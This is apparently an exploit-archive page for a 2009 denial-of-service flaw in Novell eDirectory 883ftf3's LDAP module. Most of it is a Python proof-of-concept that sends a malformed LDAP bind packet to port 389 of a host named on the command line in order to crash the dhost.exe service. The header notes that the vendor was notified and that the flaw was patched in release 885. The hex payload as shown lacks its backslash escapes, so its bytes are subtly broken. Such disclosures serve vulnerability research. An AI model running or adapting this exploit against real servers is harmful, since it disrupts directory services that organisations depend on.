Novell eDirectory 883ftf3 nldap module Denial of Service

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Novell eDirectory 883ftf3 nldap module Denial of Service
# Published : 2009-11-16
# Author : Matteo Memelli
# Previous Title : HP Openview NNM 7.53 Invalid DB Error Code Vulnerability
# Next Title : Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit

#!/usr/bin/python
# 22/03/2009
# Novell eDirectory 883ftf3 nldap module DOS
# Matteo Memelli - offensive-security.com
# ryujin ___ @ ___ offensive-security.com
#
# A malformed bind LDAP packet can make dhost.exe service crashing.
# 24/03/2009 Vendor notification; patched in 885 release
#

import sys
from socket import *

payload = (
          "x30x7Ex02x02x01x60x77x02x84xFFxFFxFFxFFx03x04x84"
          "xFFxFFxFFxFFx64x63x3Dx75x61x72x65x67x6fx6ex6ex61"
          "x63x72x61x73x68x2Cx64x63x3Dx63x6Fx6Dx2Bx64x63x3D"
          "x75x61x72x65x67x6fx6ex6ex61x63x72x61x73x68x2Cx64"
          "x63x3Dx63x6Fx6Dx2Bx64x63x3Dx75x61x72x65x67x6fx6e"
          "x6ex61x63x72x61x73x68x2Cx64x63x3Dx63x6Fx6Dx2Bx64"
          "x63x3Dx75x61x72x65x67x6fx6ex6ex61x63x72x61x73x68"
          "x2Cx64x63x3Dx63x6Fx6Dx2Bx64x63x3Dx63x6Fx6Dx80x00"
          )

s = socket(AF_INET, SOCK_STREAM)
print 'connecting...'
s.connect((sys.argv[1], 389))
print 'sending payload...'
s.send(payload)
print s.recv(1024)
s.close()
print 'Done!'